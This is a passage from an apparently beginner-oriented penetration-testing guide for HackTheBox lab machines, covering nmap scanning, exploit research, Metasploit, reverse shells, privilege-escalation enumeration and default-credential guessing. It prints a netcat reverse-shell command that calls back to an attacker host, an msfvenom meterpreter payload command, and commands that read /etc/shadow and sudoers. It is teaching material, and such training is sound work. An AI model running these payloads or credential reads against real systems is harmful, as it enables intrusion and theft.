pane under _Machines_. 76 | 77 | To discover ports, services and sometimes even the operating system we use the tool called `nmap`_._ It is a very powerful port scanner that will help us a lot. The basic syntax for nmap is: 78 | 79 | `nmap ` - scans the provide dIP address for open TCP ports. 80 | 81 | `nmap -A -n` - same as above. Additionally, the **-A** option enables OS and version detection, script scanning and traceroute. The **-n** option is to prevent nmap from performing DNS resolution, which will make the scan go slightly faster. 82 | 83 | ### How to read `nmap` results 84 | 85 | ```text 86 | nmap -A -n 64.13.134.52 87 | ``` 88 | 89 | ```text 90 | Nmap scan report for 64.13.134.52 91 | Host is up (0.045s latency). 92 | Not shown: 993 filtered ports 93 | PORT STATE SERVICE VERSION 94 | 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 95 | | ssh-hostkey: 1024 60:ac:4d:51:b1:cd:85:09:12:16:92:76:1d:5d:27:6e (DSA) 96 | |_2048 2c:22:75:60:4b:c3:3b:18:a2:97:2c:96:7e:28:dc:dd (RSA) 97 | 25/tcp closed smtp 98 | 53/tcp open domain 99 | 70/tcp closed gopher 100 | 80/tcp open http Apache httpd 2.2.3 ((CentOS)) 101 | |_html-title: Go ahead and ScanMe! 102 | | http-methods: Potentially risky methods: TRACE 103 | |_See http://nmap.org/nsedoc/scripts/http-methods.html 104 | 113/tcp closed auth 105 | 31337/tcp closed Elite 106 | Device type: general purpose 107 | Running: Linux 2.6.X 108 | OS details: Linux 2.6.13 - 2.6.31, Linux 2.6.18 109 | Network Distance: 13 hops 110 | TRACEROUTE (using port 80/tcp) 111 | HOP RTT ADDRESS 112 | [Cut first 10 hops for brevity] 113 | 11 80.33 ms layer42.car2.sanjose2.level3.net (4.59.4.78) 114 | 12 137.52 ms xe6-2.core1.svk.layer42.net (69.36.239.221) 115 | 13 44.15 ms scanme.nmap.org (64.13.134.52) 116 | Nmap done: 1 IP address (1 host up) scanned in 22.19 seconds 117 | ``` 118 | 119 | This is a pretty regular nmap scan and the output can look at bit daunting at first, but when getting used to reading nmap output, The result of this scan reveals that some ports are open. Each line that starts with a number indicates a port that nmap has identified with a status. Here you can see a mix of open and closed ports, and naturally we want to focus on those that are open. 120 | 121 | In the beginning, these ports may not mean that much to you. Most ports are connected to a service, and they are usually the same port connected to the same service, but not always. Below are some very common port to service associations that you will see. Only by hacking more boxes will you start recognizing services and know which ones are more likely targets than others. 122 | 123 | * FTP - 20, 21 124 | * SSH - 22 125 | * HTTP\(S\) - 80, 443 126 | * SMB - 139, 445 127 | 128 | You want to learn as much as possible about the target and its services. If you can figure out version numbers, operating system, specific protocols, then all this is highly relevant information for you as a hacker. As you can see from the results above, port 22, 53 and 80 are open. That means we have SSH \(22\), a DNS server \(53\) and a web server \(80\). 129 | 130 | **What now? -** Try to use `nmap` to discover open ports and services on your target 131 | 132 | ## **2 - Vulnerability analysis** 133 | 134 | **Goal** - Detect vulnerabilities in services or applications running on the target 135 | 136 | **Tools** - ****Google, searchsploit, CVE-details, Rapid7, Exploit-DB 137 | 138 | ### Finding vulnerabilities and exploits 139 | 140 | Now that we know what ports are open and what services these port signify, let's try to see if any of them have public vulnerabilities and/or exploits. 141 | 142 | As an example, lets have a look at the very famous EternalBlue vulnerability and exploit, named MS17-010. We will have a look at some common internet sources to learn more about this. 143 | 144 | #### CVE-Details 145 | 146 | CVE is a system for categorizing and scoring the severity of vunlerabliities. The website CVE-details provides us with this information. This is what the Eternalblue vulneraility looks like on CVE-details. As you can see it has quite a high CVSS score, which usually means it can be easily exploited. Also, there are direct links to Metasploit modules, which is a good sign. That means there are prepared exploits for it available for you to use. Metasploit is a framework that contains tool for very easy hacking of machines. We are getting into Metasploit very soon, so just keep reading. 147 | 148 | ![CVE-details for MS17-010, also known as EternalBlue](https://lh3.googleusercontent.com/v0mes2e-SCdJ45hLaJLpbbIykdTHGn2orgOJ58Xw9-IAmaBXD4cQgJgoLdyS5D_iZ5zddMD-Fl2mYpF-ORWIrV-JQgEDRuA4auKUoY3sNI5ljr6UgeyF67vPAwiehnl7OyUQXK2jUsM) 149 | 150 | #### Rapid7 151 | 152 | Rapid7 is the company that writes the Metasploit modules for thousands of exploits over the years, preparing them into a framework that is super easy to use. If you stumble upon an exploit and it has an associated Metasploit module you can rest assured it's been tested and is legit. Here we can see how MS17-010 looks on Rapid7's own site. You may not understand the actual details of the exploit. Don't worry! Very few do, and you will soon discover it is possible to hack without understanding every single detail. 153 | 154 | ![Rapid7 Metasploit module for MS17-010](https://lh3.googleusercontent.com/e3inunv4NBLXBlcP-LgDfEuTSpmRWEAoPlnM08CiA-jHPIDVccVIf2Q8JkcxDQocKw6eiMUvkP5RLREzpPXt_DAcpsB6Dxv9rRU3pM9hvQnXrWP2kexxDNC7x5vTSl3Y1uV1b5RIOic) 155 | 156 | #### Exploit-DB 157 | 158 | Let's go back to CVE-details and have a look at the manual exploit. Sometimes, a Metasploit module is not necessarily the best choice and as a hacker you should strive to try exploiting boxes using both manual and automatic tools. 159 | 160 | ![Original exploit for MS17-010 on Exploit-DB](https://lh6.googleusercontent.com/hTd9RIUcQxb0qalEJG0R9ZoeLmM-i9-vKXrSB0dyUV1arnK1Q9oTOhkiiXrvHhn6L8eOyi_6WWmkhTxVR-iTZ4a7ozO8Ngq6QA2CziPfu5sYvw8tGlYOlOCrmTik1aPOqXFmwKxkW78) 161 | 162 | Here you can see the original exploit code. You can download and run it as you please. It has a link back to the original CVE on CVE-details and it has been verified by the Exploit-DB team. 163 | 164 | #### Reviewing the information 165 | 166 | Finding vulnerabilities and exploits is generally easy, as most of it is pretty well documented online. It is extremely rare that we have to discover vulnerabiltiies ourselves. A very simple approach to discover vulnerabilities is to simply plug the name of the service and its version into your favorite search engine with the word "exploit" or "vulnerability" behind and see if anything shows up. Then review that information. See below for a simple example. 167 | 168 | ![A simple example of a google search for a service with a version number](.gitbook/assets/image%20%2856%29.png) 169 | 170 | Perhaps the most important thing when assessing whether a service or box is vulnerable to something is to correlate whether the service version matches. Very often you will see that certain vulnerabilites and exploits only work on specific versions, and if the version on your target does not match, well then you can still try it, but often you will be shit out of luck. If that happens, you can try moving on to researching another service, or do more research to see if you can find something a bit rarer. 171 | 172 | **What now?** - Try to find a vulnerability and an exploit that matches the service version you have identified. 173 | 174 | ## **3 - Exploitation** 175 | 176 | **Goal -** Delivering a payload 177 | 178 | **Tools -** Metasploit 179 | 180 | In this step we have enumerated a target, we have found an open port with a vulnerable service and we're hoping to exploit it. That means our goal is executing commands on the target. So how do we get command execution or as we sometimes say, deliver a payload? 181 | 182 | ### **What is a payload?** 183 | 184 | Before we move on it's important to know what a payload is. The payload is the actual information in a transmission, in our case it's a script that will provide us with some sort of reverse shell on the target. 185 | 186 | Your payload is quite simply whatever code you decide to execute on the machine. It can be something simple or it can be advanced. However, as we are hackers we want to take full advantage of the fact that we can execute commands on the target. So what we want to do is: **make the target machine connect back to our machine to get what we call a 'shell'.** Why do we want to do this? Because, when we have command execution on the remote box we can execute commands to make it connect back to us. However, the other way won't work because its not configured to accept a connection to establish a shell. Therefore in the illustration below, what's called a "normal shell" isn't possible, but since we control the 'client' part which is our Kali box we can open a port and make the server/target machine connect back. This way, we establish a connection where we can interact with the target. 187 | 188 | To read more about payloads, visit: 189 | 190 | [https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work](https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work) 191 | 192 | ### **So, what's a reverse shell?** 193 | 194 | A reverse shell is the target host connecting back to our host! It sounds weird, but that's what we use the exploit for, we get past the defenses of the target host to deliver our payload - malicious code that leverages tools already on the system to connect back to our Kali Linux box. So how do we know that the target host is connecting back? How do we "catch" our shell? 195 | 196 | ![Reverse shell vs bind shell \(normal shell\)](https://lh4.googleusercontent.com/_u5bfPsl_tFbfHvQztajcQg9Xej7SOu7y3Cu3RTBJ5RGDzZAUQdt474UFHeN4_MOmbiO1iiPbDiHnU_NmuZIaHhwjFr-HLVic23LhqiaXElqS8oNh_vDkRw3cwOkcgmNYUn1-n1BiWg) 197 | 198 | ### **The art of listening** 199 | 200 | An important concept in the world of hacking is listeners. Whenever we execute a payload, either through the Metasploit Framework \(MSF\) or manually, we need to listen for our shell to call back. We can do this in several ways, and perhaps the most common and simple way is using a tool called `netcat`, or `nc` for short. `nc` is a program used for reading from and writing to network connections, often called sockets. In the picture below we illustrate this. Let's imagine that we have successfully delivered a payload to the target that runs the following command: 201 | 202 | ```text 203 | nc 10.10.14.18 4444 -e /bin/sh 204 | ``` 205 | 206 | This executes netcat and connects to the IP address 10.10.14.18 on the port 4444, executing `/bin/sh` - one of the many shells on the linux system. If we did this without a listener nothing would happen. We need something listening on our host with IP 10.10.14.18 on the port 4444. For this we use the following command: 207 | 208 | ```text 209 | nc -lvp 4444 210 | ``` 211 | 212 | The -l is for listener, -v is for verbose and the -p is for port. This command starts a listener on your Kali machine on port 4444. Whenever the payload tries to connect to your IP address on this port with `nc` or a payload, it will "catch" the shell and you will get a terminal on the target. From there you are able to execute commands on the target. See the figure below for a basic example on how this works. 213 | 214 | ![Basic reverse shell and listener example](.gitbook/assets/image%20%2850%29.png) 215 | 216 | 217 | 218 | **Metasploit Framework \(MSF\)** 219 | 220 | As mentioned the metasploit framework and namely the msfconsole is a powerful tool that comes with premade exploits for many vulnerabilities. 221 | 222 | Metasploit is in fact not only a tool, but a powerful framework. It is a tool that makes it very easy to get into hacking, but you will soon discover its limitations too and realize that hacking requires more than just entering an IP address into a console and pressing enter. 223 | 224 | This will start loading the Metasploit console with its huge library of different payloads, exploits and fancy modules. MSF has a few different concepts that we need to be aware of: 225 | 226 | * Listener - listen for an incoming connection 227 | * Payload - executing commands on the target 228 | * Meterpreter - important tools in MSF 229 | * Use the help and search commands 230 | 231 | To start the tool type the following into your terminal: 232 | 233 | ```text 234 | systemctl start postgresql 235 | msfdb init 236 | msfconsole 237 | ``` 238 | 239 | The above commands will start the postgresql service, initialize the database and start the console itself. However, this is only necessary the first time you start it. Usually you can open the Metasploit console with: 240 | 241 | ```text 242 | msfconsole 243 | ``` 244 | 245 | Inside the console you have a lot of options, but let's continue trying to exploit the EternalBlue exploit we looked at in the earlier steps. 246 | 247 | To search for exploits, use the search command: 248 | 249 | ```text 250 | search EternalBlue 251 | ``` 252 | 253 | You can also specify more parameters if you want, like NAME, TYPE and PLATFORM. 254 | 255 | ```text 256 | msf > search name:smb type:exploit platform:windows 257 | ``` 258 | 259 | **So, how do I chose the right exploit?** 260 | 261 | Choosing the right exploit can be hard or easy - sometimes your searches will display a ton of results, sometimes none. The approach to sort through many results are based on two parameters, assuming you've searched for only exploits - namely RANK and DISCLOSURE DATE. We want to try the exploits that are newest, and that ranks highest \(excellent being the highest\). Sometimes you'll end up trying them all and none will work - enumerate more! 262 | 263 | **Modifying the exploits** 264 | 265 | So you've searched and found an exploit - but we're not ready yet. First we need to select our exploit, like so: 266 | 267 | ```text 268 | msf> use exploit/multi/samba/usermap_script 269 | ``` 270 | 271 | With the exploit selected we can modify it, like so: 272 | 273 | ```text 274 | msf (exploit/multi/samba/usermap_script) > show options 275 | ``` 276 | 277 | This will display something like this: 278 | 279 | ![Example of the options in a payload](https://blobscdn.gitbook.com/v0/b/gitbook-28427.appspot.com/o/assets%2F-LFWUjrWK-mc9zb5bbso%2F-LFgdoqNXAT6sDzPzLek%2F-LFgikUbRDXn6qLJtIBi%2Fe5f4c786-4709-4d66-bb9f-e605f788bc37.png?alt=media&token=37b6319f-61c7-49dd-8ea5-50aa830fe79d) 280 | 281 | Name is the parameters that can be set, current settings will show you what they're currently set to and required shows you what needs to be set. Usually these exploits show up with the right port, but sometimes those have to be modified. Look at the enumeration you did - if the webserver is on port 5000, then your exploit targeting the webserver needs to be on port 5000. 282 | 283 | In the example above RPORT is set correctly to 139, but we need to set the RHOST ourselves. This is our target, so we supply the IP of the target: 284 | 285 | ```text 286 | msf exploit(usermap_script) > set rhost 10.10.10.3 287 | ``` 288 | 289 | We also need to tell MSF some more stuff - what payload to use, what port to listen on and what IP-address it should connect back to. This is the same as the example used above. The MSF-module exploit will deliver the payload, but you need to supply it with the listener IP and PORT. To set this, do the following: 290 | 291 | ```text 292 | msf exploit(usermap_script) > set LHOST 10.10.14.18 293 | lhost => 10.10.14.18 294 | ``` 295 | 296 | We can also use tun0 for our LHOST \(this is the VPN-adapter connected to HackTheBox in this case\): 297 | 298 | ```text 299 | msf exploit(usermap_script) > set LHOST tun0 300 | lhost => tun0 301 | ``` 302 | 303 | Then we need to tell it what port to listen on. An important point here is that we should try to use a port that isn't already in use to avoid problems. 4444 is such a port: 304 | 305 | ```text 306 | msf exploit(usermap_script) > set LPORT 4444 307 | lport => 4444 308 | ``` 309 | 310 | Usually these exploit modules come with a premade payload, but we can also modify the payload. This, however, is something we will get more into when we get to part 2: 311 | 312 | **Conclusion:** Look for ways to upload files and/or execute commands on the target 313 | 314 | ## **4 - Privilege escalation** 315 | 316 | **Goal:** Becoming a root / Administrator user 317 | 318 | **Tools:** Mad hacker skills 319 | 320 | ### I have a shell, what now? 321 | 322 | This is the time to start a new round of enumeration. You need to figure out where you are on a machine, who you are, and start working out a way to escalate your privileges. In certain cases it might not even be necessary, because you are already Administrator. The below list is not exahustive by any means and you will find more details about this subject in [Part 4 - Privilege escalation](part-4-privilege-escalation.md). 323 | 324 | The `whoami` command displays what user you have access as. 325 | 326 | ```text 327 | whoami 328 | root 329 | ``` 330 | 331 | The `id` command shows what user and group id you have in addition to what groups you are member of. 332 | 333 | ```text 334 | id 335 | uid=0(root) gid=0(wheel) 336 | ``` 337 | 338 | The `pwd` command identifies the working directory. That means, where you are located now. 339 | 340 | ```text 341 | pwd 342 | /home/chris 343 | ``` 344 | 345 | So how does this help us to escalate our privileges? It might not directly, but it tells us who we are. If we're already root, job done. If not, we've got work to do. Privilege escalation is more enumeration, but with different tools than we use for scanning the host. 346 | 347 | **What are we looking for?** 348 | 349 | First and foremost to find out as much about the target system as possible. This will vary based on the target's operating system, but there are some common denominators, such as: 350 | 351 | * What version is the operating system running? 352 | * Which services are running? 353 | * Any scheduled tasks? 354 | * What programs are installed? 355 | * What users exist? 356 | * Anything out of the ordinary? 357 | 358 | **Linux privilege escalation** 359 | 360 | First things first. There's some things you should ALWAYS try. We can tell you one thing, but most of these things you'll learn as you go. Maybe the way to root is just one command? Well, next time you'll remember. One thing you need to do is check what commands you can run as sudo \(root\). 361 | 362 | ```text 363 | sudo -l 364 | ``` 365 | 366 | How do we find what operating system is running? 367 | 368 | ```text 369 | cat /etc/issue 370 | cat /proc/version 371 | ``` 372 | 373 | To list running services, do: 374 | 375 | ```text 376 | ps aux 377 | ``` 378 | 379 | To list all installed applications: 380 | 381 | ```text 382 | ls -alh /usr/bin/ 383 | ls -alh /usr/sbin/ 384 | ``` 385 | 386 | Scheduled tasks on Linux are called Cronjobs, and we can view them by looking at the crontab. There's a bunch of different places these hide based on the different flavors of linux, but they should all be located somewhere under the /etc/ folder. 387 | 388 | ```text 389 | crontab -l 390 | ls -al /etc/ | grep cron 391 | cat /etc/cron* 392 | cat /etc/crontab 393 | ``` 394 | 395 | When we want to find out more about what groups and users exist on Linux we can look in the /etc/ folder at the passwd and group files. We can also try to look at the shadow-file \(this is where the passwords are stored, not in the passwd ... I know, makes sense\) 396 | 397 | ```text 398 | cat /etc/passwd 399 | cat /etc/group 400 | cat /etc/shadow 401 | ``` 402 | 403 | Finding anything out of the ordinary requires you to have experience. If you look at 100 targets, then anomalies in each one will start to appear more obvious, but you might miss these things now. Don't worry, that's what friends are for! One thing you will hear a lot of in this game is "try harder", but there's something to be said for trying smarter. Try as hard as you can do it on your own, but know when you're lost, and ask for help. 404 | 405 | Finally, the go to guide for privelege escalation on Linux is the very famous [g0tmi1lk's guide](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/). 406 | 407 | 408 | 409 | **Windows privilege escalation** 410 | 411 | Now, Windows priv esc is somewhat different from Linux. Usually we use the Metasploit Framework and something called ["Local Exploit Suggester"](https://www.rapid7.com/db/modules/post/multi/recon/local_exploit_suggester). Using this is as simple as loading it and pointing it to the session. In this example we have a meterpreter shell and it's designated as session 1. 412 | 413 | ```text 414 | msf > use post/multi/recon/local_exploit_suggester 415 | msf post(local_exploit_suggester) > set session 1 416 | msf post(local_exploit_suggester) > run 417 | ``` 418 | 419 | And that's it. This will show us a list over metasploit-exploits that can be used to escalate our privilege. **For more, read** [**this** ](https://zero-day.io/windows-privilege-escalation-exploit-suggester/)**article.** 420 | 421 | Now, some times we have to get manual. To find info on the operating system, run: 422 | 423 | ```text 424 | systeminfo 425 | ``` 426 | 427 | To find other users we can use either a net command or look in the `C:\Users` directory. 428 | 429 | ```text 430 | net users 431 | dir /b /ad "C:\Users\" 432 | ``` 433 | 434 | To find groups and administrator we can also use net. 435 | 436 | ```text 437 | net localgroup 438 | net localgroup Administrators 439 | ``` 440 | 441 | To find installed software we can look in the software folder or registry. 442 | 443 | ```text 444 | dir /a "C:\Program Files" 445 | dir /a "C:\Program Files (x86)" 446 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 447 | ``` 448 | 449 | To see what's running \(processes or services\): 450 | 451 | ```text 452 | tasklist /svc 453 | tasklist /v 454 | net start 455 | sc query 456 | ``` 457 | 458 | Finally, to find scheduled tasks we can do one of the following: 459 | 460 | ```text 461 | schtasks /query /fo LIST 2>nul | findstr TaskName 462 | dir C:\windows\tasks 463 | ``` 464 | 465 | **For more, read absolomb's excellent** [**Windows Privilege Escalation Guide**](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/)**.** 466 | 467 | That's it for now. We're getting deeper into privelege escalation in part 4. Remember, what we are doing now is enumerating more! We're looking for misconfigurations, unpatched or unsecure programs, services or folders. Anything that looks weird - poke it! Be curious. And when all else fails, ask the social channel. 468 | 469 | ## Start hacking boxes 470 | 471 | If you've read the above you should be able to at least start trying to hack some machines on HTB. We recommend you start off with some of the "easy" ones, and depending on your skill level this might be very hard. The following boxes should be suitable for this level 472 | 473 | * Lame - 10.10.10.3 474 | * Legacy - 10.10.10.4 475 | * Blue - 10.10.10.40 476 | 477 | You can reset box through the Machines panel if somebody clutters it or if something is obviously wrong with it. 478 | 479 | ## **Useful commands** 480 | 481 | * `nmap ` - scan IP for open ports 482 | * `nmap -A -n ` - scan IP and services for more info \(slower\) 483 | * `searchsploit ` - search for exploits in the offline exploit database 484 | * `msfconsole`- open the Metasploit console 485 | * `whoami` - display what user you are currently logged in as 486 | * `id` - display your user and group ID \(uid/guid\) 487 | * `pwd`- display where you are 488 | * `systeminfo` - display systeminfo on Windows 489 | 490 | ## **I still have no idea where to start** 491 | 492 | **Don't worry!** This is normal. Information overload is common when learning many new things at once. Try to break everything down into baby steps so it doesn't seem so overwhelming. 493 | 494 | * Start with the IP address you got from HTB and check what operating system the machine is 495 | * Use `nmap` to find open ports 496 | * Look up the services that nmap give you on the internet 497 | * Try to think: _What am I looking for?_ 498 | * Try to think: _Is this something I should look closer at?_ 499 | * Google the words you see on the screen 500 | 501 | If you still struggle with the above to the extent where you can't even figure what to do at all, **don't worry.** **Hacking is difficult!** We recommend you take a step back and check out some of the hacking challenges from Overthewire. [Bandit](http://overthewire.org/wargames/bandit/), which is oriented around basic Linux commands is a very good place to start. Once you have at least a few of those down, you should feel slightly more comfortable with some of the concepts taught in this guide. 502 | 503 | ## I got started, but now I’m stuck 504 | 505 | * Start from the beginning 506 | * Fully enumerate 507 | * Think like a user, then like a hacker 508 | * admin admin 509 | * Google everything 510 | * Take a break and come back to it 511 | * Try smarter 512 | * Ask another hacker 513 | * Look up the machine on the [HTB forum](https://forum.hackthebox.eu/) 514 | * Ask us 515 | 516 | Happy hacking! 517 | 518 | -------------------------------------------------------------------------------- /part-2-hacking-manually.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | Take your hacking skills beyond automatic tools like Metasploit, to understand 4 | what hacking is really about. 5 | --- 6 | 7 | # Part 2 - Hacking manually 8 | 9 | ## What do you learn in this part? 10 | 11 | * Hacking manually with the Metasploit framework 12 | * Linux terminal tricks 13 | * Nmap options and scripts 14 | * Credential abuse 15 | * Privilege escalation 16 | * Hacking more boxes! 17 | 18 | **Boxes that are suitable for this part** 19 | 20 | * Devel - 10.10.10.5 21 | * Mirai - 10.10.10.48 22 | 23 | **Other relevant boxes** 24 | 25 | * Blocky 26 | * Optimum 27 | 28 | ## **Hacking manually with the Metasploit framework** 29 | 30 | Previously we used Metasploit to automagically exploit a vulnerability and get a shell on a box. But what kind of black magic does Metasploit do? Let's break it down: 31 | 32 | 1. It prepares a payload - a reverse shell - the code that executes on the target. 33 | 2. It prepares a listener/handler for receiving the reverse shell 34 | 3. It uses a prepared exploit to exploit a vulnerable service. Which means it gets code execution on the target, and is then able to execute the payload. 35 | 36 | The listener catches the reverse shell connection - we now have a connection / reverse shell on the target, but we can't always rely on Metasploit to do this for us. 37 | 38 | ### 1 - Preparing the payload 39 | 40 | First we prepare a payload with the correct file extension. The payload has to match your listener in Metasploit, and the technology on the target. Imagine a web-server running IIS, and we've found out we can upload files and where the files are put. Let's generate an ASPX-payload using msfvenom: 41 | 42 | `msfvenom -p windows/meterpreter/reverse_tcp lhost=your_ip_addr lport=4444 -f aspx -o yourname.aspx` 43 | 44 | * -p = payload 45 | * -f = format 46 | * -o = outputfile.extension 47 | 48 | ![](.gitbook/assets/image%20%2820%29.png) 49 | 50 | We then use the `cat`command to print the contents of the file we generated. As you can see it's a bunch of mumbo jumbo code, but this is actually the _payload_, the code that will execute on the system to give you access. 51 | 52 | ![](.gitbook/assets/image%20%2858%29.png) 53 | 54 | ### 2 - Setting up a listener 55 | 56 | Now that we have prepared our payload, we open msfconsole, which we will use to deliver our payload to the target box. 57 | 58 | `msfconsole` 59 | 60 | ![](.gitbook/assets/image%20%2817%29.png) 61 | 62 | Select the handler module, which lets us set up a listener to "catch" our shell from the payload we created: 63 | 64 | `use exploit/multi/handler` 65 | 66 | Set the correct payload \(needs to be identical to the payload we specified in `msfvenom`. If it does not match, it will not work properly and you will most likely not get a reverse shell back. 67 | 68 | `set payload windows/meterpreter/reverse_tcp` 69 | 70 | Now that our payload is selected we're going to check which options we have to set. So we type `options` 71 | 72 | ![](.gitbook/assets/image%20%2823%29.png) 73 | 74 | As you can see below there are three required options that must be set to start the listener. We also note that two of the options are already set for us. Hence, the only thing we have to do is set the listener address \(lhost\) option. The lhost and lport options must match exactly those we set when we created our payload. We don't need to use the IP address can also just set lhost to tun0, which is the VPN-adapter used for connecting to HackTheBox. 75 | 76 | `set lhost tun0` 77 | 78 | `set lport 4444` 79 | 80 | Once you have done this, type `options` to verify that you have set all the required options correctly. Some of them are filled automatically, and some must be manually entered. 81 | 82 | ![](.gitbook/assets/image%20%2847%29.png) 83 | 84 | We now start our listener, the `-j` option runs the listener in the background, so you can continue using msfconsole while it's listening for incoming sessions. Please also note that sometimes the listener will start on the wrong IP address, so much sure it's correct. Usually this problem is fixed by setting the lhost again, and running the exploit command again. 85 | 86 | `exploit -j` 87 | 88 | To see currently active listeners, use the "jobs" command: 89 | 90 | `jobs` 91 | 92 | To see all currently active sessions you can type: 93 | 94 | `sessions` 95 | 96 | To interact with a session use the following command, where n is the numbered session you wish to interact with. 97 | 98 | `sessions -i n` 99 | 100 | ctrl+z is the shortcut to background sessions. 101 | 102 | ### 3 - Running an exploit 103 | 104 | Ok, so we have prepared our payload and listener. Now we need to actually find a way to upload and execute this payload on our target. In Part 1 of this guide we used an already prepared exploit module in Metasploit to exploit the target, but this time we actually have to manually do the uploading and execution. First, try to find a way to upload the payload to the machine. Many services like FTP \(port 21\) and SSH \(port 22\) allow file uploads. You then need some way to execute it. When you are able to find a way, remember to have your listener ready so your payload, the reverse shell can call back to your listener. 105 | 106 | #### Uploading files to the target 107 | 108 | The figure below shows a simple example where we use FTP to upload a payload to the server. In the green box in the bottom left corner you can see we first navigate to the `/var/www/html` directory, which is a common directory for web servers on Linux systems. We then use the `put` command to upload a payload, in this case a PHP file since we are hoping to trigger it from the web server that runs PHP. 109 | 110 | ![File upload to target using FTP](.gitbook/assets/image%20%2818%29.png) 111 | 112 | #### Executing payload on the target 113 | 114 | Now that we have successfully uploaded our payload, we need to execute it on the box. Maybe you remember from part 1 that this is called "code execution". It means we are executing arbitrary code on the target machine. As you can see in step 2 in the figure below, we navigate to the IP address of the target machine in the web browser and trigger the file we uploaded earlier. How does this work? Well, if you see the previous step above, we put the file in the web directory of the target, so the file is accessible on port 80, that is through HTTP. When we run this file in the browser, it executes the code it contains, the payload, which is a reverse shell. That makes it connect back to our machine and we get a reverse shell. We have now successfully compromised that machine. 115 | 116 | ![Executing a payload on the target](.gitbook/assets/image%20%283%29.png) 117 | 118 | #### I'm not that lucky 119 | 120 | * What if no service appears to be vulnerable and I can't find any exploit? 121 | * What if there is no obvious way like uploading a file using FTP or SSH? 122 | * What if let's say only port 80 is open? 123 | 124 | This will happen to you, often. So, how do we then get our payload on the target? 125 | 126 | We need to start exploring more manual ways of getting our payload on the target. Since port 80 is open it means the target is running a web server. So start by navigating to the IP address of the target in the web browser in Kali. Start looking around and take a good look at what the webapp is. Is it a shop of any kind, a wordpress blog, does it have a login portal? Explore the source code of the page. 127 | 128 | Remember, the kinds of vulnerabilities we found earlier have been on a lower level, that is vulnerabilities in the server itself. Now we are hunting for vulnerabilities that reside in the web application. This is a whole new game, so we have dedicated entire [Part 3](part-3-web-hacking.md) of this guide to it. 129 | 130 | ## **Credential abuse** 131 | 132 | Reuse of credentials \(usernames, passwords and keys\) and default credentials are the most common vulnerabilities, and you will see it everywhere. It's such an easy win if it works that you must never forget to at least try even though it may seem unlikely. 133 | 134 | * Try defaults like: `admin/password` and `admin/admin` 135 | * Google default creds for whatever you are looking at. E.g. _"wordpress default login"._ 136 | * Combine different usernames and passwords you find around. You never know where somebody could have reused them. 137 | 138 | A fun exercise here can be to google your own home router make and model to see if you can find the default username and password. If you are the legal owner of the router, try to log in and see what happens! 139 | 140 | ![](https://lh3.googleusercontent.com/7mdc-kMI1RuZJ5sgYeDmlH26L2AOSULraoWBllzrqrivEGEYo9TpZFBCYL0cMbVTVIyhUbnhxT6go7Cp18kNmo9RPGX93Slky-CnhAHi9P1OlqgLCI7EDl5rCFp9IY-6fgr-bfm6ZWM) 141 | 142 | ## **Linux terminal** 143 | 144 | For help with a command, type command and then 145 | 146 | `-h` or `--help` 147 | 148 | `man ` - Displays the man\(ual\) page for command line tools 149 | 150 | `cat` - Display the contents of files 151 | 152 | `less ` - view and navigate the contents of a file 153 | 154 | `grep` - search for words inside a file `` 155 | 156 | `find` - locate files and directories 157 | 158 | `locate ` - locate a file 159 | 160 | `strings` - find text in files 161 | 162 | `ssh @>ip-address>` - connect to a box using SSH \(secure shell\) on port 22 163 | 164 | `<` and `>` is called redirection. That means you can take the output of a command and write it to another file. See example below with `echo` and `>` If the `filename.txt` file does not exist it will be created. 165 | 166 | `echo “string” > filename.txt` 167 | 168 | `python -m SimpleHTTPServer 80` - Start a simple web server to host files on Kali 169 | 170 | `wget /` - Download a file from a server 171 | 172 | `apt install ` - Installing things in Kali 173 | 174 | ## **Nmap tricks** 175 | 176 | Let's refresh some of the nmap options we used earlier and take a look at some new ones. 177 | 178 | `-A` OS detection, version detection, script scanning, and traceroute. Gives a lot of useful info which will help you find vulnerabilities 179 | 180 | `-v` verbose, provides more output when scanning 181 | 182 | `-n` skip DNS resolve, saves some time scanning 183 | 184 | So the command becomes 185 | 186 | `nmap -A -n -v` 187 | 188 | ### Nmap scripts 189 | 190 | The nmap scripting engine can be quite useful to improve the discovery of services. Kali comes with a lot of nmap scripts you can find here, using the `ls` command 191 | 192 | `ls -la /usr/share/nmap/scripts/*` 193 | 194 | Here is the command, but with a wildcard \(\*\) to look up all scripts that start with smb. Maybe you remember that SMB is the file sharing protocol for windows, which is great for hackers because it can be used for so much, and is a generally vulnerable protocol. The MS17-010 exploit that we had a quick look at in Part 1 was an SMB exploit. 195 | 196 | ![](.gitbook/assets/image%20%2864%29.png) 197 | 198 | So let's try to use nmap with a script. It can also be wise to supply nmap with a port when you are scanning specific services. You can do this with the `-p` option followed by the port. See the example below using port 139 and 445 \(SMB runs on these\) for running a script that scans for the MS17-010 vulnerability from earlier in this guide. 199 | 200 | `nmap --script ` 201 | 202 | `nmap 10.10.10.10 --script smb-vuln-ms17-010 -p 139,445` 203 | 204 | ## **Privilege escalation** 205 | 206 | In the beginning of your hacking journey, privilege escalation can be very daunting. Because you don't really know exactly what you're looking for. That's why we have the entire [fourth part of this guide](part-4-privilege-escalation.md) dedicated to breaking it down into simple steps. However, to make sure you don't get stuck in the mud at this point, we have included some of the basics which might help. You will probably see these tricks repeated with further detail in part four. 207 | 208 | ### Linux 209 | 210 | For linux: [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 211 | 212 | Confidential information and users that you can check. 213 | 214 | `id` 215 | 216 | `su` 217 | 218 | `sudo -l` 219 | 220 | `cat /etc/passwd` 221 | 222 | `cat /etc/shadow` 223 | 224 | `cat /etc/group` 225 | 226 | `cat /etc/sudoers` 227 | 228 | `ls -alh /var/www/` 229 | 230 | `ls -ahlR /root/` 231 | 232 | `ls -ahlR /home/` 233 | 234 | ### Windows 235 | 236 | #### Metasploit exploit suggester 237 | 238 | If you have gotten a Meterpreter session on a windows box but you realize you are not an administrator you have to escalate your privileges. Sometimes, boxes are not properly patched and you can use local exploits that exploit vulnerabilities in the Windows kernel to escalate. Metasploit has several post modules for this purpose. Post means they can only be used after you have compromised the machine and gotten a Meterpreter or shel. However, we need to find such exploits and the exploit suggester automatically searches for exploits that may allow you to escalate privileges. 239 | 240 | When we get a meterpreter we see a message that says something like "Meterpreter session 1 